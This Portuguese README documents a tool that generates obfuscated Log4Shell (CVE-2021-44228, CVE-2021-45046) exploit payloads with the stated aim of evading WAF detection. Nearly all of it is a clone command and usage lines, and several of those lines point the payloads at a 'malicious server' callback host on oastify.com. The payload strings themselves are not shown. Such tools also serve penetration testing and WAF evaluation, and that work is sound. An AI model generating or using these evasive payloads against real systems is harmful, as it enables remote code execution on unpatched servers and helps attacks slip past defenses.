
Gere payloads ofuscados primários ou secundários dos CVEs CVE-2021-44228 ou CVE-2021-45046 para evadir a detecção de WAF.
O Log4Shell-obfuscated-payloads-generator pode gerar payloads ofuscados primários ou ofuscados secundários do CVE-2021-44228 ou CVE-2021-45046 para evadir a detecção de WAF.
A ideia de design do Log4Shell-obfuscated-payloads-generator
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
O Log4Shell-obfuscated-payloads-generator funciona imediatamente com Python versão 3.x em qualquer plataforma.
Para obter uma lista de opções básicas, use:
python3 Log4Shell-obfuscated-payloads-generator.py -h
Para obter exemplos de uso, use:
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h: obter uma lista de opções básicas

-hh: obter exemplos de uso

Com uma única opção para gerar payloads, a opção -s especifica o servidor malicioso:
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

Com múltiplas opções para gerar payloads, a opção -s especifica um servidor malicioso:
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

Sem especificar um servidor malicioso com a opção -s, o placeholder {{callback_host}} será preservado nos payloads gerados:
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
